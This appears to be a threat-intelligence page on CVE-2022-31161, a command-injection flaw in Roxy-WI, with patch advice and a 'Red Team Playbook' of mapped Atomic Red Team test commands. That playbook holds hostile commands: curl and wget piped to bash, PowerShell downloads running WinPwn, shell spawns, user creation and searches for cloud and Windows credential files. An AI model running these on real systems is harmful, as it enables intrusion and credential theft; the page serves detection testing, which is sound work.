CVE-2022-31161
Overview
This vulnerability is a command injection flaw rooted in improper input handling within the subprocess_execute function of the /app/options.py component in Roxy-WI. The function executes system commands constructed from user-supplied inputs without sanitization or validation, allowing arbitrary command execution. The affected feature is the system command execution interface exposed via the web management platform for HAProxy, Nginx, and Keepalived servers.
Vulnerability Description
Roxy-WI is a Web interface for managing HAProxy, Nginx and Keepalived servers. Prior to version 6.1.1.0, the system command can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Version 6.1.1.0 contains a patch for this issue.
Impact
An unauthenticated remote attacker can exploit this vulnerability over the network to execute arbitrary system commands with the privileges of the Roxy-WI application. This can lead to full compromise of the underlying server, unauthorized data access, and potential lateral movement within the network. The attack requires no user interaction or authentication (AV:N/AC:L/PR:N/UI:N), making it highly exploitable and critical in operational environments.
Solution
Upgrade Roxy-WI to version 6.1.1.0 or later, as this release contains a patch that properly sanitizes user inputs in the subprocess_execute function. Refer to the official GitHub security advisory GHSA-pg3w-8p63-x483 and the release notes at https://github.com/hap-wi/roxy-wi/releases/tag/v6.1.1.0 for detailed patch instructions. No alternative workarounds are documented; applying the vendor-provided update is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Roxy-WI arises from improper input handling within the subprocess_execute function, which allows remote command execution. This flaw is particularly concerning because it permits an attacker to execute arbitrary system commands on the server without any authentication or validation of the input provided by the user. The vulnerability is rooted in the design of the application, where user-supplied data is directly passed to the system command execution context, creating a significant security risk. The lack of input sanitization means that an attacker can craft malicious input to execute commands that could compromise the integrity, confidentiality, and availability of the server and the applications it manages.
Exploitation of this vulnerability can be achieved through various attack vectors. An attacker could leverage the web interface of Roxy-WI, submitting crafted requests that include malicious commands. Given that the application is designed to manage critical components like HAProxy, Nginx, and Keepalived, an attacker could gain control over these services, potentially leading to a complete takeover of the server. Scenarios may include executing commands to manipulate server configurations, exfiltrate sensitive data, or deploy additional malicious software. The ease of exploitation, combined with the high privileges typically associated with web management interfaces, makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability is profound, especially for organizations relying on Roxy-WI to manage their web traffic and server health. A successful attack could lead to significant business risks, including service disruptions, data breaches, and reputational damage. For instance, if an attacker were to modify configurations or redirect traffic, it could result in downtime or loss of service for end users. Additionally, the potential for data exfiltration could expose sensitive customer information, leading to compliance violations and legal repercussions. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, emphasizing the urgent need for organizations to address it.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, they should ensure that they are running the latest version of Roxy-WI, as the patch in version 6.1.1.0 addresses this specific issue. Regularly updating software and applying security patches is a fundamental practice in maintaining a secure environment. Furthermore, organizations should conduct thorough security assessments and penetration testing to identify any potential vulnerabilities in their web applications. Implementing web application firewalls (WAFs) can also help filter out malicious input before it reaches the application layer. Additionally, monitoring logs for unusual activity can aid in early detection of exploitation attempts.
In conclusion, the vulnerability in Roxy-WI represents a significant threat to organizations that utilize this web management interface. The combination of improper input handling and the potential for remote command execution creates a pathway for attackers to compromise critical server infrastructure. Organizations must prioritize the implementation of security best practices, including timely updates, proactive monitoring, and robust input validation, to safeguard against such vulnerabilities. By taking these steps, businesses can mitigate risks and protect their assets from the evolving landscape of cyber threats.
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting the Roxy-WI vulnerability, accompanied by a modest rise in the EPSS score. This uptick in activity, while not yet indicative of a rapid escalation, signals growing interest from threat actors in leveraging the unauthenticated remote code execution vector. The emergence of new proof-of-concept exploits further lowers the barrier for adversaries to mount attacks, potentially expanding the pool of less sophisticated actors capable of compromising vulnerable systems. For defenders, this evolving landscape underscores the necessity of heightened vigilance, as the vulnerability’s critical severity combined with increasing exploitation trends elevates the overall threat level. Although the increase is gradual, it reflects a trajectory that could lead to more widespread exploitation if left unaddressed, thereby amplifying risks to organizations relying on Roxy-WI for server management.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Roxy-Wi | Roxy-Wi | All |
cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload | Nuri Çilengir | webapps | python | - | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-31161 |
| github.com |
GitHub CVE
|
https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-pg3w-8p63-x483 |
| github.com |
GitHub CVE
|
https://github.com/hap-wi/roxy-wi/releases/tag/v6.1.1.0 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/171652/Roxy-WI-6.1.1.0-Remote-Code-Execution.html |